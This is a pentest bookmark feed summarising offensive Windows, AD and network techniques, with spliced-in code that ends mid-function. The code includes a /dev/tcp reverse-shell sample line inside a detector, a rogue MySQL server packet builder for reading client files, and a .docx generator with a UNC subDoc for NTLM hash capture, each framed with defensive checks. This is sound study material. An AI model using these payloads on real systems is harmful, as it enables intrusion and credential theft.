
whip_lash : pentest   322

SensePost | A new look at null sessions and user enumeration
TL;DR: I think I found three new ways to do user enumeration on Windows domain controllers, and I wrote some scripts for it.
activedirectory  pentest  enumeration 
9 hours ago by whip_lash
Reverse MSSQL shell
Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
github  pentest  exfiltration  sql  reverseshell 
13 hours ago by whip_lash
TestingScripts/snmpv3enum.rb at master · raesene/TestingScripts
# This class just wraps snmpwalk and iterates over a series of IP addresses and usernames
# Designed to brute-force a snmpv3 username
# for it to work on ubuntu you need to have the snmp programs and MIBs installed
snmp  snmpv3  bruteforce  pentest  enumeration 
yesterday by whip_lash
Extracting SSH Private Keys from Windows 10 ssh-agent
Favorite tweet:

New blogpost: extracting unencrypted private SSH keys from Windows 10's new builtin ssh-agent service

Had some fun this weekend playing with the new OpenSSH utilities on Windows 10. Might be useful for pentesters/redteamers :)

— Ronnie Flathers (@ropnop) May 20, 2018
security  ssh  pentest 
3 days ago by whip_lash
GitHub - bettercap/bettercap: The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks.
bettercap is the Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks.
github  network  pentest  tool 
6 days ago by whip_lash
InfoSec Handlers Diary Blog - Internet Storm Center Diary 2018-05-07
A Job file[1] is a special XML file that contains all the details to configure a scheduled task on a Microsoft Windows host. More technical details about this file format can be found here[2].
persistence  postexploitation  windows  pentest 
17 days ago by whip_lash
Lab of a Penetration Tester: Silently turn off Active Directory Auditing using DCShadow
One very interesting thing which I recently discovered is the ability to DCShadow to modify System Access Control List or SACL. When we enable auditing on success or failure on an AD object, an entry (called ACE - Access Control Entry) is added to the SACL of that object. The permissions to an object are controlled by a DACL. For example, we modified DACL of AdminSDHolder in the previous post for persistence.
activedirectory  pentest  security  dcshadow 
20 days ago by whip_lash
Escalating privileges with ACLs in Active Directory | Fox-IT International blog
This blogpost describes a scenario where our standard attack methods did not
work and where we had to dig deeper in order to gain high privileges in the domain.
We describe more advanced privilege escalation attacks using Access Control Lists
and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx
that automate the steps for this advanced attack.
activedirectory  windows  pentest  privilegeescalation  security 
25 days ago by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/
printf "GET / HTTP/1.0\nHost:\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
27 days ago by whip_lash
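A detection-side companion to the ISC diary above, added here and not part of the diary: the /dev/tcp and /dev/udp pseudo-devices exist only inside bash, so any process command line, auditd EXECVE record or shell history that references them is bash opening a socket. The scanner below pulls out the protocol, host and port and marks lines that also spawn an interactive shell (the classic reverse-shell form). The sample command lines are constructed, and the IP addresses are documentation ranges.

```python
import re

# bash resolves /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT itself; nothing of that name exists
# on disk, so a command line mentioning them means bash itself opened the connection.
DEV_SOCKET = re.compile(
    r"/dev/(?P<proto>tcp|udp)/(?P<host>[A-Za-z0-9_.:\-]+)/(?P<port>\d{1,5})"
)
# An interactive shell on the same line (bash -i, sh -i, ...) turns a plain connection
# into a reverse shell once stdin/stdout are redirected to the socket.
INTERACTIVE_SHELL = re.compile(r"\b(?:ba|da|z)?sh\s+-i\b")

# Constructed sample lines as they might appear in a process listing or audit log.
SAMPLE_LINES = [
    "bash -c 'exec 5<>/dev/tcp/203.0.113.7/80; printf \"GET / HTTP/1.0\\r\\n\\r\\n\" >&5; cat <&5'",
    "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1",
    "cat /dev/tcp_stats.log | grep -v /dev/null",
    "echo hello > /dev/udp/192.0.2.9/514",
]


def find_dev_sockets(command_line: str) -> list:
    """Return (proto, host, port) for every /dev/tcp or /dev/udp reference with a sane port."""
    return [
        (m.group("proto"), m.group("host"), int(m.group("port")))
        for m in DEV_SOCKET.finditer(command_line)
        if 0 < int(m.group("port")) < 65536
    ]


def classify(command_line: str):
    """None if the line opens no bash socket, otherwise (kind, hits)."""
    hits = find_dev_sockets(command_line)
    if not hits:
        return None
    kind = "reverse_shell" if INTERACTIVE_SHELL.search(command_line) else "outbound_connection"
    return kind, hits


def scan(lines) -> list:
    """(line_number, kind, hits) for every line that opens a socket through bash."""
    results = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict is not None:
            results.append((n, verdict[0], verdict[1]))
    return results


if __name__ == "__main__":
    for n, kind, hits in scan(SAMPLE_LINES):
        print(f"line {n}: {kind}: {hits}")
```

Line 3 of the sample is a deliberate near-miss (a file whose name merely starts with /dev/tcp) and is not flagged; the pattern requires the full /dev/tcp/host/port shape.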
PDF Files Can Be Abused to Steal Windows Credentials
Baharav published research this week showing how a malicious actor could take advantage of features natively found in the PDF standard to steal NTLM hashes, the format in which Windows stores user credentials.
windows  pentest  hashes  ntlm  responder 
27 days ago by whip_lash
Pwned by a Shortcut – Tom Melo – Medium
I wrote a small CLI tool called lnk2pwn to make the process of generating malicious shortcuts easier and I’m going to be using this tool to prepare the attack
windows  pentest  malware 
27 days ago by whip_lash
w00tsec: Abusing MySQL LOCAL INFILE to read client files
Recently, I was playing the VolgaCTF 2018 CTF with my teammates from TheGoonies and we came across an interesting Web challenge that we didn't manage to solve during the competition. The following day, I read the write-up and learned a cool technique to attack the MySQL client directly via the LOAD DATA INFILE statement.
mysql  pentest 
28 days ago by whip_lash
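The technique the w00tsec write-up describes works because the LOAD DATA LOCAL INFILE exchange is driven by the server: after any query, a server may answer with a 0xFB "LOCAL INFILE request" packet naming a file, and a client that advertised CLIENT_LOCAL_FILES sends that file back. The block below is an added example, not code from the write-up or from any real MySQL implementation: it builds the server-side packets a rogue server needs (greeting with the CLIENT_LOCAL_FILES bit, OK packet, the 0xFB request), reassembles the file the client returns, and shows the client-side check a hardened driver would apply (reject 0xFB unless the last statement really was LOAD DATA LOCAL INFILE). Version string, salt and sample file bytes are constructed.

```python
import re
import struct

# Capability bits from the MySQL client/server protocol (subset).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LONG_FLAG = 0x00000004
CLIENT_LOCAL_FILES = 0x00000080      # advertises LOAD DATA LOCAL support
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def packet(seq: int, payload: bytes) -> bytes:
    """Wire framing: 3-byte little-endian length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def split_packets(stream: bytes):
    """Yield (seq, payload) pairs from a stream of framed packets."""
    off = 0
    while off + 4 <= len(stream):
        length = struct.unpack("<I", stream[off:off + 3] + b"\x00")[0]
        seq = stream[off + 3]
        yield seq, stream[off + 4:off + 4 + length]
        off += 4 + length


def server_greeting(conn_id: int = 1, salt: bytes = b"A" * 20,
                    version: bytes = b"5.7.21-rogue") -> bytes:
    """Handshake V10 packet (seq 0). What matters is CLIENT_LOCAL_FILES in the capability
    flags; the rest is just enough for a client to continue with the login."""
    caps = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_LOCAL_FILES
            | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
    body = (b"\x0a" + version + b"\x00" + struct.pack("<I", conn_id)
            + salt[:8] + b"\x00"                 # auth-plugin-data part 1, filler
            + struct.pack("<H", caps & 0xFFFF)   # capability flags, lower 16 bits
            + b"\x21"                            # character set: utf8_general_ci
            + struct.pack("<H", 0x0002)          # status: SERVER_STATUS_AUTOCOMMIT
            + struct.pack("<H", caps >> 16)      # capability flags, upper 16 bits
            + bytes([len(salt) + 1])             # auth-plugin-data length (20 bytes + NUL)
            + b"\x00" * 10                       # reserved
            + salt[8:] + b"\x00"                 # auth-plugin-data part 2 (13 bytes)
            + b"mysql_native_password\x00")
    return packet(0, body)


def greeting_capabilities(greeting: bytes) -> int:
    """Parse the capability flags back out of a Handshake V10 packet."""
    _, body = next(split_packets(greeting))
    pos = body.index(b"\x00", 1) + 1             # skip protocol version + server version
    pos += 4 + 8 + 1                             # connection id, salt part 1, filler
    lower = struct.unpack_from("<H", body, pos)[0]
    upper = struct.unpack_from("<H", body, pos + 2 + 1 + 2)[0]   # after charset + status
    return lower | (upper << 16)


def ok_packet(seq: int) -> bytes:
    """Minimal OK packet: header 0x00, affected rows 0, insert id 0, status flags, warnings."""
    return packet(seq, b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0))


def local_infile_request(seq: int, path: str) -> bytes:
    """The rogue server's reply to any COM_QUERY: 0xFB followed by the file it wants."""
    return packet(seq, b"\xfb" + path.encode())


def collect_local_file(stream: bytes) -> bytes:
    """The client answers a LOCAL INFILE request with the file split over packets,
    terminated by an empty packet."""
    chunks = []
    for _, payload in split_packets(stream):
        if not payload:
            break
        chunks.append(payload)
    return b"".join(chunks)


LOAD_LOCAL = re.compile(
    r"^\s*LOAD\s+DATA\s+(?:(?:LOW_PRIORITY|CONCURRENT)\s+)?LOCAL\s+INFILE\b", re.I)


def client_should_reject(last_query: str, server_payload: bytes) -> bool:
    """Client-side check a hardened driver performs: a 0xFB reply is only legitimate
    right after this client issued a LOAD DATA LOCAL INFILE statement."""
    if not server_payload or server_payload[0] != 0xFB:
        return False
    return LOAD_LOCAL.match(last_query) is None
```

Sequence on the wire for the rogue server: server_greeting() (seq 0), the client's login response (seq 1), ok_packet(2), the client's first COM_QUERY (seq 0 of a new command), local_infile_request(1, path), the file packets from the client (seq 2 onwards, ending with an empty packet), then ok_packet with the next sequence number. Disabling local_infile on the client (or rejecting 0xFB as client_should_reject does) is the fix; nothing the server says should be able to read a client-side file.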
How to prevent bypassing AppLocker using Alternate Data Streams – Gunnar Haslinger
So, what’s the trick to bypass AppLocker: We copy the contents of an executable to an Alternate Data Stream of the logs-directory. To be clear: Not to a file in the logs-directory, but to an ADS of the logs-directory itself! The copy-job is done using the “type” command redirecting the output to an ADS. The execution of an ADS can be done by various ways, one way would be to use wmic to create a new process, but there are other ways too.
pentest  security  windows  postexploitation  whitelist-evasion 
5 weeks ago by whip_lash
bohops on Twitter: "Is Explorer.exe the ultimate #lolbin? explorer.exe [exe/hta/scr/...etc] *Invokes child processes when called (after a lookup of the the default program handler) *Hides from the default filter in AutoRuns *Just might be doing a little m
Favorite tweet:

Is Explorer.exe the ultimate #lolbin?

explorer.exe [exe/hta/scr/...etc]

*Invokes child processes when called (after a lookup of the default program handler)
*Hides from the default filter in AutoRuns
*Just might be doing a little more on a workstation in your network#DFIR

— bohops (@bohops) April 19, 2018
Twitter  pentest  security  windows  postexploitation  whitelist-evasion 
5 weeks ago by whip_lash
GitHub - api0cradle/LOLBAS: Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Favorite tweet:

A good documentation on all the different #LOLBins and #LOLScripts would be nice? Right?

Good thing I have started then. Still have a lot of notes to add, but I feel this is a good start. Would love community feedback and contributions.

Is this useful?

— Oddvar Moe [MVP] (@Oddvarmoe) April 19, 2018
Twitter  pentest  security  livingofftheland  whitelist-evasion  postexploitation  windows 
5 weeks ago by whip_lash
subTee: WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
So here we have it, another tool, like regsvr32.exe, that can accept a script path or URL and execute it.

Much like regsvr32, wmic is proxy aware, and works over TLS.
windows  postexploitation  pentest  whitelist-evasion 
5 weeks ago by whip_lash
dafthack/PowerMeta: PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retri
PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta.
recon  pentest 
6 weeks ago by whip_lash
Dumping Clear-Text Credentials | Penetration Testing Lab
The article contains Windows locations where passwords might exist and techniques to retrieve them.
passwords  windows  security  pentest  postexploitation 
7 weeks ago by whip_lash
PowerShell/Invoke-ReflectivePEInjection.ps1 at master · clymb3r/PowerShell
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please read the Notes section (GENERAL NOTES) for information on how to use them.
powershell  pentest 
7 weeks ago by whip_lash
mwrlabs/bsides18_breakfree: Example tools and output from BSides 2018 "I Want to Break Free"
This is an example word document containing a macro which, when executed, will drop an XML file to disk and run it using msbuild.exe. This is to demonstrate a method of bypassing default AppLocker rules without calling PowerShell.
pentest  malware 
7 weeks ago by whip_lash
OS Command Injection; The Pain, The Gain - Black Hills Information Security
I was confused. I definitely had command injection but nothing was working. I finally figured out that the command length was limited to 32 characters, likely because it was being written to a database first. I discovered this by sending the ping command over and over again with varying numbers of spaces until it stopped working.
security  commandinjection  pentest 
8 weeks ago by whip_lash
GitHub - eladshamir/Internal-Monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Mimikatz
The Internal Monologue Attack flow is described below:

Disable NetNTLMv1 preventive controls by changing LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic to appropriate values, as described above.
Retrieve all non-network logon tokens from currently running processes and impersonate the associated users.
For each impersonated user, interact with NTLM SSP locally to elicit a NetNTLMv1 response to the chosen challenge in the security context of the impersonated user.
Restore the original values of LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic.
Crack the NTLM hash of the captured responses using rainbow tables.
Pass the Hash.
hash  postexploitation  pentest  security  github 
9 weeks ago by whip_lash
Top Five Ways I gained access to Your Corporate Wireless Network (Lo0tBo0ty KARMA edition)
I’ve been able to snag credentials for EAP and TTLS networks, where other Evil Twins fail. A set of valid user credentials can allow privilege escalation and persistence that can sometimes take a red team weeks to establish.
wireless  pentest  security 
9 weeks ago by whip_lash
Creating Static Binaries for Nmap, Socat and other Tools –
In various scenarios it might be helpful or even required to have a statically compiled version of Nmap available. This applies to e.g. scenarios where only limited user privileges are available and installing anything to the system might not be desirable.

For such cases I’ve started to create recipes to build such binaries.
nmap  pentest  security 
12 weeks ago by whip_lash
WSH Injection: A Case Study – Posts By SpecterOps Team Members
Some environments use whitelisting to prevent unsigned Windows Scripting Host (WSH) files from running, especially with the rise of malicious .js or .vbs files. However, by “injecting” our malicious code into a Microsoft signed WSH script, we can bypass such a restriction.
whitelist  pentest 
february 2018 by whip_lash
How to Bypass Application Whitelisting & AV - Black Hills Information Security
Here, we will show you one method of bypassing some application whitelisting products.
february 2018 by whip_lash
Gambler - Hacking and other stuffs
Recently I posted how to get the ssh password using strace, but it’s not 100% effective, because the strace output changes on different distros, so searching for another approach I found this site ChokePoint where they show how to create a PAM module using python to log failed attempts on ssh; now all I had to do was change where they log the password.
ssh  pentest 
february 2018 by whip_lash
cloudtracer/paskto: Paskto - Passive Web Scanner
Paskto will passively scan the web using the Common Crawl internet index either by downloading the indexes on request or parsing data from your local system. URLs are then processed through Nikto and known URL lists to identify interesting content.
webapp  pentest 
february 2018 by whip_lash
Replicator helps developers to reproduce issues discovered by pen testers. The pen tester produces a Replicator file which contains the findings in the report. Each finding includes a request, associated session rules or macros, and logic to detect presence of the vulnerability. The tester sends the Replicator file to the client alongside the report. Developers can then open the file within Burp and replicate the issues. When vulnerabilities have been fixed, Replicator provides confirmation that the attack vector used in the pen test is now blocked. A retest is still recommended, in case alternative attack vectors remain exploitable.
burp  webapp  pentest  report 
february 2018 by whip_lash
If you haven't already killed Lotus Notes, IBM just gave you the perfect reason to do it now, fast • The Register
All that's needed to reproduce the bug, Borup wrote, is to compile his proof-of-concept code and give it a static link as MSIMG32.dll; copy that file to C:\windows\temp; and run sc control lnsusvc 136 at the command line.
ibm  lotusnotes  security  pentest 
february 2018 by whip_lash
VENOM 1.0.15 - Metasploit Shellcode Generator/Compiler/Listener - KitPloit - PenTest Tools for your Security Arsenal ☣
The script will use msfvenom (metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one template (example: python) "the python function will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to receive the remote connection (shell or meterpreter session).
malware  pentest 
february 2018 by whip_lash
Feature, not bug: DNSAdmin to DC compromise in one line
We will shallowly delve into the protocol’s implementation and detail a cute feature (certainly not a bug!) which allows us, under some circumstances, to run code as SYSTEM on domain controllers, without being a domain admin.
dns  domain  activedirectory  exploit  privesc  pentest  security 
february 2018 by whip_lash
SSH Hijacking for lateral movement | xorl %eax, %eax
By setting MaxSessions to 1 you can disable ControlMaster/session multiplexing and each new session will require a complete new connection that includes the authentication step. However, if you don’t, then regardless of how strong authentication method you are employing for your users, an attacker only has to get code execution to one of your user’s endpoints and wait for that user to SSH somewhere. The attacker can look for the open connections by inspecting the directory specified by ControlPath directive on the client’s side or just using common tools like netstat. Then, if the attacker attempts to open an SSH session to a host that it is already in the ControlMaster, it will require no authentication or establishing a new connection as it is re-using the existing one.
pentest  ssh  security 
february 2018 by whip_lash
Public Release of Hate_Crack - Automated Hash Cracking Techniques with HashCat - TrustedSec
Martin Bos covered several of these attacks in a previous post, describing his methodology for cracking the LinkedIn hash dump of 2012. If you don’t know Martin (formerly known as pure_hate), he is a long-standing member of Team Hashcat, has competed in several hash cracking contests, and has an unhealthy obsession with cracking hashes. The sharing of his methodology inspired the creation of this script, so that our team could up their hash cracking game.
hash  hashcat  hashes  pentest 
february 2018 by whip_lash
Enumdb - MySQL and MSSQL Brute Force And Post Exploitation Tool To Search Through Databases And Extract Sensitive Information - KitPloit - PenTest Tools for your Security Arsenal ☣
Enumdb is a brute force and post-exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials.
database  sql  MySQL  bruteforce  pentest 
january 2018 by whip_lash
CNIT 127: Exploit Development -- Sam Bowne
Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals.
Advisory: CS 110A or equivalent familiarity with programming
pentest  exploit  development  programming  security  learning  class 
january 2018 by whip_lash
smb2-vuln-uptime NSE Script
Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation.

SMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs.

Remember that a rebooted system may still be vulnerable. This check only reveals unpatched systems based on the uptime, no additional probes are sent.
smb  pentest  nmap  nse  vulnerability  scanner 
january 2018 by whip_lash
http-form-brute NSE Script
Performs brute force password auditing against http form-based authentication.
nmap  nse  pentest  webapp  bruteforce 
january 2018 by whip_lash
GitHub - dzonerzy/winescalation: Python based module to find common vulnerabilities which lead to Windows privilege escalation
This is a Python based module for fast checking of common vulnerabilities affecting windows which lead to privilege escalation
python  windows  privilegeescalation  privesc  pentest  security 
january 2018 by whip_lash
evilsocket/bettercap: A complete, modular, portable and easily extensible MITM framework.
bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.
github  security  pentest  mitm 
january 2018 by whip_lash
mitm6 – compromising IPv4 networks via IPv6 | Fox-IT International blog
Running the attack itself is quite straightforward. First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command prompt is the host is the -wh parameter and with it specify the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existing hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action, mitm6 selectively spoofing DNS replies and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.

hash  relay  ipv6  mitm  pentest  security 
january 2018 by whip_lash
10 common mistakes aspiring/new pentesters make – PentesterLab
Reversing and writing exploits are amazing things to do and you should definitely look into these two domains. However, if you want to break into infosec and score your first job, you need to be good at web (and mobile and network to a lesser extent) security. Most pentesting companies have a lot of their workload composed of web testing and this is not going to change in the next few months. Furthermore, they also have senior people who are dying to do more research and will probably have priority on all the reversing/exploit writing jobs. So if you want to increase your likelihood of getting hired, you need to become a gun at web pentesting.

pentest  jobs  career 
january 2018 by whip_lash
Operation Cobalt Kitty: A large-scale APT in Asia carried out by the OceanLotus Group
The attackers arsenal consisted of modified publicly-available tools as well as six undocumented custom-built tools, which Cybereason considers the threat actor’s signature tools. Among these tools are two backdoors that exploited DLL sideloading attack in Microsoft, Google and Kaspersky applications. In addition, they developed a novel and stealthy backdoor that targets Microsoft Outlook for command-and-control channel and data exfiltration.

apt  security  pentest 
january 2018 by whip_lash
Who can add workstation to the domain – Dubai Security Blog
So taking into consideration above 2 items, by default any authenticated user can join up to 10 machines to the domain.
activedirectory  security  pentest 
january 2018 by whip_lash
Web Application Firewall (WAF) Evasion Techniques – secjuice™ – Medium
Why use ? instead of *? Because the asterisk (*) is widely used for comment syntax (something like /* hey I’m a comment */) and many WAFs block it in order to avoid SQL Injection… something like UNION+SELECT+1,2,3/*
waf  hacking  pentest  security 
january 2018 by whip_lash
Top 32 Nmap Command Examples For Sys/Network Admins - nixCraft
The -D option makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won’t know which IP was scanning them and which were innocent decoys:
nmap  pentest 
january 2018 by whip_lash
Abusing Microsoft Word Features for Phishing: “subDoc” - Rhino Security Labs
In the above configuration, we’re telling Word to open a sub-document over the network using a UNC path which points external to their network. The destination IP address, in this case, is a VM instance that we control, hosted by a cloud provider which allows incoming SMB requests.

At this point, we’re able to load which allows us to listen for incoming SMB requests and collect the respective NTLMv2 hashes.
hashes  Microsoft  office  vulnerability  pentest  responder  security 
january 2018 by whip_lash
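The subDoc trick above, like the PDF and LNK variants bookmarked earlier on this page, comes down to a document part that references a UNC path, which makes the client authenticate to an SMB server of the attacker's choosing. The block below is an added example, not Rhino's tooling or anything from the blog post: it assembles a minimal .docx in memory with a w:subDoc whose relationship is External and points at a UNC share, and then runs the check a mail gateway or sandbox would apply to any incoming Office file, scanning every .rels part for external relationships with network targets. The document content, relationship id and the 203.0.113.10 address are constructed; assumes the target string contains no XML-special characters beyond what escape() handles.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
REL_TYPE = R_NS + "/"
# A UNC path or file:// URL makes Word (via the SMB/WebDAV redirector) connect out and authenticate.
NETWORK_TARGET = re.compile(r"^(?:\\\\|//|file:)", re.IGNORECASE)

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)
ROOT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId1" Type="{REL_TYPE}officeDocument" Target="word/document.xml"/>'
    '</Relationships>'
)


def build_docx(subdoc_target=None) -> bytes:
    """Constructed minimal .docx. With subdoc_target set, the body holds a w:subDoc whose
    relationship is External and points at that path; with None it is a harmless empty document."""
    body = '<w:p><w:subDoc r:id="rId1"/></w:p>' if subdoc_target else '<w:p/>'
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:body>{body}</w:body></w:document>'
    )
    rels = ""
    if subdoc_target:
        target = escape(subdoc_target, {'"': "&quot;"})
        rels = (f'<Relationship Id="rId1" Type="{REL_TYPE}subDocument" '
                f'Target="{target}" TargetMode="External"/>')
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">{rels}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", ROOT_RELS)
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


def find_network_relationships(docx_bytes: bytes) -> list:
    """Scan every .rels part for External relationships whose target is a network path.
    Returns (rels_part, relationship_type, target) tuples; an empty list means nothing flagged.
    Checking .rels rather than document.xml catches subDoc, attachedTemplate, hyperlink and
    any other relationship type that can carry a UNC target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and NETWORK_TARGET.match(target):
                    findings.append((name, rel.get("Type", "").replace(REL_TYPE, ""), target))
    return findings


if __name__ == "__main__":
    sample = build_docx(r"\\203.0.113.10\share\payload.docx")
    for part, rel_type, target in find_network_relationships(sample):
        print(f"{part}: {rel_type} -> {target}")
```

Word resolves the UNC target as soon as the document is rendered, and the NTLMv2 response it sends is what the listener in the blog post captures; blocking outbound SMB (TCP 445) at the perimeter is what stops the leak regardless of which document feature triggers it.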
Cracking Encrypted PDFs – Part 1 | Didier Stevens
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge).

Here is how I decrypted the “easy” PDF (encryption_test).
pdf  hacking  pentest  security 
january 2018 by whip_lash
Relayer - SMB Relay Attack Script - KitPloit - PenTest Tools for your Security Arsenal ☣
Relayer is an SMB relay Attack Script that automates all the necessary steps to scan for systems with SMB signing disabled and relaying authentication request to these systems with the objective of gaining a shell. Great when performing Penetration testing.
smb  pentest  windows 
december 2017 by whip_lash
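Both the Relayer entry above and the smb2-vuln-uptime NSE script bookmarked earlier rely on the same unauthenticated message: the SMB2 NEGOTIATE response, which carries the server's SecurityMode (is signing required?) and its SystemTime and ServerStartTime before any session is set up. The parser below is an added example, not the NSE script's code or Relayer's: it reads those fields out of a constructed response, derives uptime and the signing policy, and exposes the two questions a tester asks (can this host be relayed to, and has it been up since before a given patch date). The dialect, timestamps, GUID and buffer sizes in the sample response are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# Little-endian layouts from MS-SMB2: the 64-byte header (2.2.1.2) and the 64-byte fixed part of
# the NEGOTIATE response (2.2.4); StructureSize there is 65 because it counts one byte of Buffer.
HEADER_FMT = "<4sHHIHHIIQIIQ16s"
NEGOTIATE_FMT = "<HHHH16sIIIIQQHHI"

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def build_negotiate_response(dialect: int, security_mode: int,
                             system_time: datetime, boot_time: datetime) -> bytes:
    """Constructed server reply for the offline demo; only fields the parser reads carry real values."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(NEGOTIATE_FMT, 65, security_mode, dialect, 0, b"\x11" * 16,
                       0, 0x800000, 0x800000, 0x800000,
                       datetime_to_filetime(system_time), datetime_to_filetime(boot_time),
                       128, 0, 0)      # empty security buffer, no negotiate contexts
    return header + body + b"\x00"


def parse_negotiate_response(data: bytes) -> dict:
    """Pull dialect, signing policy and both timestamps out of a NEGOTIATE response.
    All of this arrives before authentication, which is why the check is so quiet."""
    if len(data) < 128 or data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    header = struct.unpack_from(HEADER_FMT, data, 0)
    command, flags = header[4], header[6]
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    fields = struct.unpack_from(NEGOTIATE_FMT, data, 64)
    security_mode, dialect, system_ft, boot_ft = fields[1], fields[2], fields[9], fields[10]
    system_time = filetime_to_datetime(system_ft)
    boot_time = filetime_to_datetime(boot_ft)
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
        "system_time": system_time,
        "boot_time": boot_time,
        "uptime": system_time - boot_time,
    }


def booted_before(info: dict, patch_release: datetime) -> bool:
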